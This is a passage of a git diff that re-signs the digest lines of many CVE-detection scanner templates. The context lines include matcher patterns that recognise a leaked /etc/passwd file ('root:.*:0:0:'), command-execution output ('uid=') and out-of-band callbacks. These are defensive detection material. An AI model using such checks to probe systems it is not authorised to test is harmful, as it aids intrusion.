b/http/cves/2021/CVE-2021-43287.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220773163e2853dbed5f6fd4fae6f2f2b243b2605757ec3331c0551eb640638ea0802203c9ca3865da4f10c60c361481455fa5ccfc8bfaa6870724c8ddf74fd7167e254:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202ce07e747cb8f969b74cdf4fed467541e1bb852dfb8165765e83a0ac8add396402205caf3e80c5a97506d436ce3f7d8671ad11e8dd5246606251a92f7f55212670b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml index 14cdce307c..1575d10d5b 100644 --- a/http/cves/2021/CVE-2021-43574.yaml +++ b/http/cves/2021/CVE-2021-43574.yaml @@ -64,4 +64,4 @@ http: - 500 - 403 condition: or -# digest: 4b0a00483046022100f705a6aae88335620af088599ebed27625e3e46caf952bab2a320688df01cf5c022100f9a8a8d4f4cd062bffd80ea3493e2b6e85e209824e278f3b7d62619174083e62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eeea0e388f2ef7f5e60a67a282f6b6663defb5f91df3b49da930d83438d993e5022100906de516a9536d558b471945942d9fde3c6f87a526fd579ff52780c8f993713e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml index 06fa51c27f..81cfb99ae1 100644 --- a/http/cves/2021/CVE-2021-43725.yaml +++ b/http/cves/2021/CVE-2021-43725.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a32a805b26b2f28db0ebabd7a780eee017ecff6957e00616a43b00c062ba231502205f2fe8e68648e6b4aec358570005a88497189826988ddc5683f6df0961ea5d3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009b5e197e94aec3c0f5cbee4a6b1ede662f66f8239b76a638b3114bccd7e0dca702206f528d7422fac33d7ac6d6a921e8142344ee58e3bae675972b3e1a5e16913426:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml index 6852c573f6..5ca6cb2492 100644 --- a/http/cves/2021/CVE-2021-43734.yaml +++ b/http/cves/2021/CVE-2021-43734.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ff571572d59488430e0f0e46235af01ae322d987ab4e6d6c5ea12094d438483b02203207ab5bdea3f11504cce1805418b4b11dcc570e1fd427df104363775d78d551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ee3f10d81c289c9a054e121e2fecc01df78a7e2884e0d13b8beb9d10ce97085e0220145e2ffaed715f3cb9b8df3fd1371425e7275cdbc3a50c576e653658f5dc2051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43798.yaml b/http/cves/2021/CVE-2021-43798.yaml index b975326856..cd2d747cf1 100644 --- a/http/cves/2021/CVE-2021-43798.yaml +++ b/http/cves/2021/CVE-2021-43798.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022006e969ce9263f4a3e3db8029312a1cedfb5f6b51e452ef014080e879485508c7022100c9f3a7b14ebabee62df5310b48d15f491a8ee89a97fd4cd675b859a4ae26d546:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022050118adca991a7f07761c8351913fc4b5960316753e65fa20460f81e04d81eb20220286826655b0e45a8c3a77fbeb34a15b0cdaf80ad76f670adf9d7dd7ee7e6e820:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml index ef3de506fc..f2172e9521 100644 --- a/http/cves/2021/CVE-2021-44138.yaml +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207dfc82f46979080f52275d61a856c67032779173eb7ab4f02cb3b41b6d2d6e5b022100c940dc9e671f37ffee26ae725400e1fd6d17bc3d7a35c79f2f7c3f998a4a53cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022052d06787d224de559293d4e6aecf3500acba291fda8878f59e51f27725800b5f022100fda5a77cbd4a3972e0d6d764a0d39a3f05f77439b36ce94767b48b7f025ef915:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml index bd2ddb4685..7a8e03ef7e 100644 --- a/http/cves/2021/CVE-2021-44139.yaml +++ b/http/cves/2021/CVE-2021-44139.yaml @@ -54,4 +54,4 @@ http: - '"success":true' - '"msg":"success"' condition: and -# digest: 4b0a00483046022100eadb7914d64bb98ffb2e8f027270243e510c589db3395932abc4394a717e2e14022100a90a89798dd6ea107d1f8a30e7dea96df6d758a05bab69f8b22f2b5a313a5929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eff30e40ed2017143fb8fc2fdd6400505235c5abd034d094e25cf4eefe47ed05022100ff302af2ff8d9982ec1b066859213c009f22ef2e33472d7808511113df739261:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml index 0d2b00e43b..708493e019 100644 --- a/http/cves/2021/CVE-2021-44152.yaml +++ b/http/cves/2021/CVE-2021-44152.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a22c092d9cee3316ecc435afc5ec64b74493d1ff5c6cc276e03708c3d434f336022100f0d0b9f9f6f4f9fed61ac6b2c0bc88b1257206c8b0d74955d368cf1616aab6cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206ebb01db7a2300f8533c227572012699dafdced642831c9ef66f0f46a10d424e02207155abc7f27496bd7311609c86cd2757c2202bee788da18e1f4b4511cb4f0afb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml index eaaaffbd1f..57ea040a0f 100644 --- a/http/cves/2021/CVE-2021-44451.yaml +++ b/http/cves/2021/CVE-2021-44451.yaml @@ -78,4 +78,4 @@ http: - 'name="csrf_token" type="hidden" value="(.*)"' internal: true part: body -# digest: 490a004630440220176fb89ec397b980e0ea26b87b815baa059d323de3337a8ec24e2e8c0a0cf15c02200bf16edd4b919cf25c6319ccc3019ee169d54b7a91c0c242d9465cdfa96f030f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ec26d683da461e0c64c000eb0d2699103f7fe20da2746848901a7991563a1a39022046b2c1cfb95d46307e1ab584765b8b8f0293e4e216b7982846388d4770015d10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44515.yaml b/http/cves/2021/CVE-2021-44515.yaml index b44a958333..73b76ce58d 100644 --- a/http/cves/2021/CVE-2021-44515.yaml +++ b/http/cves/2021/CVE-2021-44515.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210088cc9496c36425cadeb76ea850dad7bb090ed0a984a63d2b0e428b8b9c15d4c7022023a9097c12c361205278e5f91692f4ee708b673b2e5c2ae2fe9133245e8ccc8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204e74c9d1f872acadab6809554240d33d2c3a6a705337456e69661b6c4269fc3102201e4fa02653abb82c07fca7c5bfc73a5150cc4431d900a7da941012f48ae57e2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml index 2f822a2ac8..b6b5f74efa 100644 --- a/http/cves/2021/CVE-2021-44528.yaml +++ b/http/cves/2021/CVE-2021-44528.yaml @@ -50,4 +50,4 @@ http: - 302 - 307 - 308 -# digest: 490a00463044022041a5bfe743ece67393de950b3147a79655a7b85ee8894afbf4efbdc69ce9875802206e5416d29b5b4f879bcd4ba617698831bafe87a57be4bea18453dedc8a9bb98d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202e17defd2bec99a425ef4169ac6e7c1c7ba664d3b16709a279b2f94ae69dde52022046f77ca762df2b14a27c411bbaa31e6c1dfed4d7335950bff320bc46921cdda6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index 1049ac9750..df9d02e938 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206de4940bcfbaeec3cfc158a834aa4d26dabf808d70cfb3d8828e7d6e479c6f620221008dcc9d93a7c83756d8908295da6244aff47e98b5e201bc83e46e9875ae7b7405:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f24336b3ebbf8925e8a3cd2bddaa35d7f6d2def132d50d637d36c8358554f96602205f4f669229b390d54dba12b2586bcd023eabed4d623b535db1043f41a467347a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml index 212dd1d043..a979ad202b 100644 --- a/http/cves/2021/CVE-2021-45043.yaml +++ b/http/cves/2021/CVE-2021-45043.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205f51c32131f54757336dd8dbfc3c9b407b605a60b7031b50ab3bcd3766dfdc14022100c7707d27db0cd3a80abba289bded6cf51b5344c85e4e452d8b808ec28e5651b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203b7e44f07c89decaa411dd8b3c03703b519e0cf14eadef0ef756e5bd40301ceb02204cc7d53794c708a5ec88fc59273a2989bd5c3cbc73bb6aceeb7e07c21e0c5c64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml index 24385a6024..e537afab3d 100644 --- a/http/cves/2021/CVE-2021-45380.yaml +++ b/http/cves/2021/CVE-2021-45380.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d866b4bf394249189039df296942e181b1d17de0da9977db18eb26ca96e416bb022100e7e0b2ab0d85ca71feeadebfe223cfbfe8df03b957b24e56b5b6f8f5e25de82e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022024384de6b0a93a051de72f068095500e01f5bf0fd5d96183c75e1ade1adb1730022100f6a242764334999f7835ead6985abcf58b92a4c28cfcc89f243145506f884932:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index 35cd7a7e17..aa72210f56 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200cd0273b0b4112a3101fe3bcfc0632d7d0e2030b68ecb66ca77a8fe879c63c2002206d979b7b19b1736268dcb83a8e0df7b58b84d3ac98cdd4a1c6886a485b64219e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ac870d49384ac442c32cedba2869c491ba2e0ec090d82f5eaecbd91204e42b040221008fc62b27104615633841db3d150c17eadf9d8d436ff451c136a1a2ec82fc27ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46073.yaml b/http/cves/2021/CVE-2021-46073.yaml index 5470e65105..7c98a794d8 100644 --- a/http/cves/2021/CVE-2021-46073.yaml +++ b/http/cves/2021/CVE-2021-46073.yaml @@ -60,4 +60,4 @@ http: - "status_code_3 == 200" - 'contains(body_3, " Test")' condition: and -# digest: 4a0a004730450220757267cd8631c395b818e7a758bef11697b09c2dbfecd910ceff8f7bfdbb6dd3022100bb35d3060642b78da6284c56746a4e317f459abd72f73212538e28c64ae56ca8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a96d3af0aac3b22cd69738643941944444daba57a4d989ce5bad7797f69df3bd022100d25c9a88345d256148db9c2175d9f6a21773358cac529a6971408ffd89bd2bfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml index 8efddaec54..71f858f5de 100644 --- a/http/cves/2021/CVE-2021-46107.yaml +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -55,4 +55,4 @@ http: dsl: - "regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')" - "contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')" -# digest: 4a0a004730450220308e436f3812ee2c86e9a0dd3485b0c280de884f4dd058cf64998796bcee5b8f022100e8797ab16b58b8097467f492ff3289fa9a625c6ca05dfa7c2393afad27754b53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022018a75911b456d748818b488d2405893f3090918a6ecf049af6ebf58b6cbe5fe302210084ab0204778aae3db4974d8f21a0c6c8d55fe7531f66845beaf7fe934ff7c37d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml index 93fb980545..e46935f6eb 100644 --- a/http/cves/2021/CVE-2021-46387.yaml +++ b/http/cves/2021/CVE-2021-46387.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f42531f553199accb345fbb738d65888d84a2c5938bb6c8960eba8d5ff4f54cc02207e67187126865a8f1e8297e0c7bdde57b31aebe284eb51692c08da5d6c8d1cf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200f72b56f4f11b6b2d21305f88e3bc6a0c8c7afed7a69bd0dbbfb013669b5d353022100e6ff8ec57f15000992f251a85abd14b07e518baaf5e8fdf11effc7c4f23d4500:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 2258c6bda3..4cb170a283 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -45,4 +45,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a0047304502207f9cb8263cc4a340f2c356f27f694c4ccc555f88d31ea32a1d35e42387cbd5f2022100a66741c5bdf309e684c115d8ce0f88fd0202a7e11f8de10dca60c1ebd339d083:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220513bea16bbb12a8f1928e5058cc3083aa2c68ce081834fc82a44dc857105948a022100bcba114fd94a81272c7b73cf9cbf70272cb0f8e5512015dba9bd41d6cc7ad6d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46418.yaml b/http/cves/2021/CVE-2021-46418.yaml index 4437c0a141..e163606b61 100644 --- a/http/cves/2021/CVE-2021-46418.yaml +++ b/http/cves/2021/CVE-2021-46418.yaml @@ -46,4 +46,4 @@ http: - 'contains(server_1, "lighttpd") && contains(content_type_2, "text/plain")' - 'contains(body_2, "{{randstr}}")' condition: and -# digest: 4b0a00483046022100ab0da40d59f1fe58d094affd1049fb5fddd02a3c3185bc017818f2502c4f1760022100c680b57f51a63b27f63a39b075843a9f7fb2a2f812184a2d6808386f2c65b5c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205bfc9f8b8c9e5038d1c3cd44bcc15e4ef08e2a344a2dddf2d3f1f9c55ed02521022100d0d00b82efff29a484e4e1cb3b1d1dd3ab7acdc204c311843553ab09aa2e7524:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46419.yaml b/http/cves/2021/CVE-2021-46419.yaml index d715dc2e4c..1535d650ba 100644 --- a/http/cves/2021/CVE-2021-46419.yaml +++ b/http/cves/2021/CVE-2021-46419.yaml @@ -54,4 +54,4 @@ http: - 'status_code_1 == 201 && status_code_2 == 204' - 'contains(server_1, "lighttpd")' condition: and -# digest: 4b0a00483046022100836f459243054ed4599e1a550348930f61760c782d08b4b777531b594cadf30602210092fc02dd2d5f6bdb18b684a79cbc91bd12d4c85f4bdb4a080e9c8f46d9ebdd0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200592ad91a07482fede472446b33bcc5602a33c2fd06553ac0959c07acf8546ce02202410c96a6eee49251461df4631c64d00d54559f171487ab9c109fe683b244bc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46424.yaml b/http/cves/2021/CVE-2021-46424.yaml index 2b8528f7fc..15b1e8c0e9 100644 --- a/http/cves/2021/CVE-2021-46424.yaml +++ b/http/cves/2021/CVE-2021-46424.yaml @@ -51,4 +51,4 @@ http: - type: dsl dsl: - "status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404" -# digest: 4b0a00483046022100f56f78cdf75e21107ee40468318d47fdcd9f03e1677885c3f34ffedf96d52c38022100cb63934ffb047fab79222824aecba25718240aaf3af82a3449485e672286a86c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022068767c775db28fe6384f139340712299dc9fee5a2da3ea49fccbeb875603957802201ada10d866a7cbbd00fd43fd1a0218c5a29ed8e579f948d4f4d376bd7e02d12a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46704.yaml b/http/cves/2021/CVE-2021-46704.yaml index a958d31aec..50ef8551d6 100644 --- a/http/cves/2021/CVE-2021-46704.yaml +++ b/http/cves/2021/CVE-2021-46704.yaml @@ -63,4 +63,4 @@ http: regex: - uid=(\d+)\((\w+)\) part: body -# digest: 4a0a00473045022100c48413ebe1c771ce04661c715f0d38a651b134d2eee3ec668769d473ec9bb29b02203c4793a9acb4f5bc01be66bd04d169007c3b8046d68d79073378e0e10ebba3c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c30ada079bc3b6c6faabb2ae19304dc2eefaf203a8a629d7cebcb4d07740ea5e022100c4961255633d9d7a2725a44b252f17eb7a424bf784222ec1181cc43e4a5d3478:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml index 84c97ebe05..12f4a9ef3e 100644 --- a/http/cves/2022/CVE-2022-0169.yaml +++ b/http/cves/2022/CVE-2022-0169.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100af9edcd692d399d59f4ac310e4497715beac9fa92fec8cb90a04d9234c44b9c202200f8ab602cf5b277cfeb426e9e080e682f0c431588ae087a33608fd2c656c4210:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022064759738b702e3e2b8635c38219338faa75f1319271621dd38a9ae88af4c9782022100d6d0a9a1e9303895054138f4e3021dc5bd8b5ba30a52f3528fb0fc3cc46b2e67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0201.yaml b/http/cves/2022/CVE-2022-0201.yaml index f903b4b300..4919f550fc 100644 --- a/http/cves/2022/CVE-2022-0201.yaml +++ b/http/cves/2022/CVE-2022-0201.yaml @@ -48,4 +48,4 @@ http: part: header words: - text/html -# digest: 490a00463044022026f5edf6c9325db54e5dba0b0e39a8ad5fead51d43680b3a5a21b56c956d5c9202205b2e57c67c716336383fa1af54b8b29eec6b914edfbae42fbcbcc1f0f6e799aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008c06d6874a2519e8423b2769a4ad1c1fb83e01ecb95480d09bb27c76abde9129022018f709b1ad9c66d79205c5b66ce9aca52fe52b2fa20402b980b430ddc5e18838:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0220.yaml b/http/cves/2022/CVE-2022-0220.yaml index 20beb4db78..aca58b69a4 100644 --- a/http/cves/2022/CVE-2022-0220.yaml +++ b/http/cves/2022/CVE-2022-0220.yaml @@ -59,4 +59,4 @@ http: - 'nonce":"([0-9a-z]+)' internal: true part: body -# digest: 4b0a00483046022100b3722d9e009d5c1c3e2d7b7b51c634728bdcde176567f826c364a6a5a919c92f022100d014f3e7b4ad3ede1574768235689cbe63eb8cfb5429fa3bf3cf27308243695b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e02839bf439c786dc403d1f9068b6627f20037a8497c124fccc26971be97d80c02206a813a54036cd065b878e71ed94b9a46a33fd2281532067ae05762d8ee7dddca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0228.yaml b/http/cves/2022/CVE-2022-0228.yaml index 203bb5afb9..6eff669250 100644 --- a/http/cves/2022/CVE-2022-0228.yaml +++ b/http/cves/2022/CVE-2022-0228.yaml @@ -52,4 +52,4 @@ http: - 'contains_all(body_2, "first name", "last name", "email")' - 'contains(content_type_2, "application/octet-stream")' condition: and -# digest: 4a0a00473045022100e47ac805de175bc32661b1b254018da773b76d377655e776ffd17c5bd1c2c69b0220576195e2b3c34fade0a82a5eda6b7a9ee898580086ba151d8eeb0d5112c9b816:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a5e5bdb6821dc08d643eb1c9f95862b8116cf731542887e87ce5a5ed42b204700221008d7575ffb8f524c90d05db2e9bbd5e0ce26c0b8e227622602cd1f104061c73c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml index 2b78063b5d..f6b2cecd4b 100644 --- a/http/cves/2022/CVE-2022-0271.yaml +++ b/http/cves/2022/CVE-2022-0271.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220121fab424e81a01466a4b21fafbbd52485cf994244760c19eea5e429a3783c1f022012de38a4abc996c3eb2f45dafb2824b01e4aaf301f7c0a3bd84efc13b13ba11d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205d36412bc6ab9bf5b96434628078cfeef1582f4d83725147433cda330c68122002206e97991fbc7911736bacb51ce16578e9e122c7b85bf5f0a8a35db5bff8ccdde4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0281.yaml b/http/cves/2022/CVE-2022-0281.yaml index 9906c9614f..396b8beca0 100644 --- a/http/cves/2022/CVE-2022-0281.yaml +++ b/http/cves/2022/CVE-2022-0281.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c111361481180f44493bd61efe5ca22aa1d543889e629e48f1c7a7be22a8e25802205fbf4063808b1e61d84458ca90b142339f86796b9b32deafab8dfa2b59ceda85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100de30dfcc5601b9b90eb5582d0ccd01f8aa8d4a3808aba7830fe3a819bf44a795022100c924231ddafce34af8c94a0c2e7dea5c455754b4fb822ac8005bf4fe3aa0c113:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml index 767c564c99..e67398e8ae 100644 --- a/http/cves/2022/CVE-2022-0342.yaml +++ b/http/cves/2022/CVE-2022-0342.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204c4a0d8a4c5da1b24b4ca73f20ed5fdee24e4c1892d4e1a075e1002fe92808f4022052cd178910e95afe13abbfb265b687f35a62b6a5abbf2c2aed83508299db6f5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206fae7bc55274609f066f21992f0eaa76d7bfdf965e2845acf950d1b779aa078c022100b735c8d363b276e112c6f7f45d7b6517aaf1ffa5e8111c20f217db71a159acec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml index f781f8dd17..9a129c16ff 100644 --- a/http/cves/2022/CVE-2022-0378.yaml +++ b/http/cves/2022/CVE-2022-0378.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022007b6e8a40d0f6e3870e036d67724fb0fd08cfb74510615437a45350d356e17b0022100c9199fa07b53fc012be43bf8c94b4a8caa190a241e907da5e1f265d86ac41aa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c7dd6ff4a2f129651521cd47c435983f36c233182c2a92c7e9bfc70f9795a54022100f559b88a765a7a56a195b42e62680948a9ff42c10a481f0093c898f6a1c94563:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0381.yaml b/http/cves/2022/CVE-2022-0381.yaml index 9eedff76b0..1e547a1461 100644 --- a/http/cves/2022/CVE-2022-0381.yaml +++ b/http/cves/2022/CVE-2022-0381.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100909ee1b627b444bdc18d71639aa85fa4fdff674e941acf8c72f639e8e45755c40220535a70f0c8e6d7466ff71b65b837c7365003a67097937d72232fb3ce1bb07f1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220332cb624bdfc2a31384398785b3689febdebbae9e565ea51c7d46cd3ddacd54e0220640eb406ada6c4efb67a8f2d1a578bffdd049913a838784ce13b13375748e53b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml index f76c10feff..771bde235a 100644 --- a/http/cves/2022/CVE-2022-0415.yaml +++ b/http/cves/2022/CVE-2022-0415.yaml @@ -123,4 +123,4 @@ http: regex: - ' "uuid": "(.*)"' internal: true -# digest: 4a0a00473045022100b774784e49a3df9cb00ce5134b63c19ea5801279d3f73fe8258a4e7bd9188229022051f7258a2efb6c517fe4b6ef37652544f75db790e763869e48c545dc779f6604:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200d8ef6d64f56736b9f4df649e0b8a901e1a6c156d7d926865321279d635f17e4022100e580aba4cadd6840a8ca15efa3aaf5afc09849320cafadf6eecbfa672db2cb58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0424.yaml b/http/cves/2022/CVE-2022-0424.yaml index de1d4da9ce..f202a1ce56 100644 --- a/http/cves/2022/CVE-2022-0424.yaml +++ b/http/cves/2022/CVE-2022-0424.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022036b95be2c5e81b2f7f46714c33c9ef61fb51532f84b8b1dbe5a1ea0e9e8522e70220359bbe2eae61e508bced72287041dc5e1b2d9d9f7b25a2986ffefa3d037d0811:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ae353cf33f8d15e38265c2427ecce8e3066f6773a07cfe3c63352f886f6b8424022100b95faab2e54951afdeb5de9b658305b20c7c8d0e846ea7088c2bd6b1e8cc3746:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0533.yaml b/http/cves/2022/CVE-2022-0533.yaml index dc0db1b43f..9374c36765 100644 --- a/http/cves/2022/CVE-2022-0533.yaml +++ b/http/cves/2022/CVE-2022-0533.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains_all(body_2, "", "ditty")' condition: and -# digest: 4b0a00483046022100c4651a3184861c8bbefb7f1a74c31c6e9527e47135d228a5a04d67cd03771316022100e8a79a6ba89389c010f02d82bca8078e990a30bcfbb116683f13564dec7ce16d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f97bded3db4bac253ddcac3f8e3e5332c3dfeec870e17feeca56c7212ec76906022100a9772902f834f9fbf84673172051f68a49626401232c894cd25075054c591e29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0540.yaml b/http/cves/2022/CVE-2022-0540.yaml index 1c430c29ef..bbfc228752 100644 --- a/http/cves/2022/CVE-2022-0540.yaml +++ b/http/cves/2022/CVE-2022-0540.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b356f158d98318a855357790576be317b29c040cc4b83e9ce5c9fe54fc6684eb02206bea066d8503896703de749d0cbdc015c9910fb42cc3671fa481e6e72d71ab25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b2114f4e6b78ee95e3d980763ce9d6e0af1cb937f410989aa53544d632e48f5d022078d5a5fe237fbce1cdcc3f7b2bb853a60fae0b41e55f94c9a75b9dd27758daee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index a511b1731c..25533036d5 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ 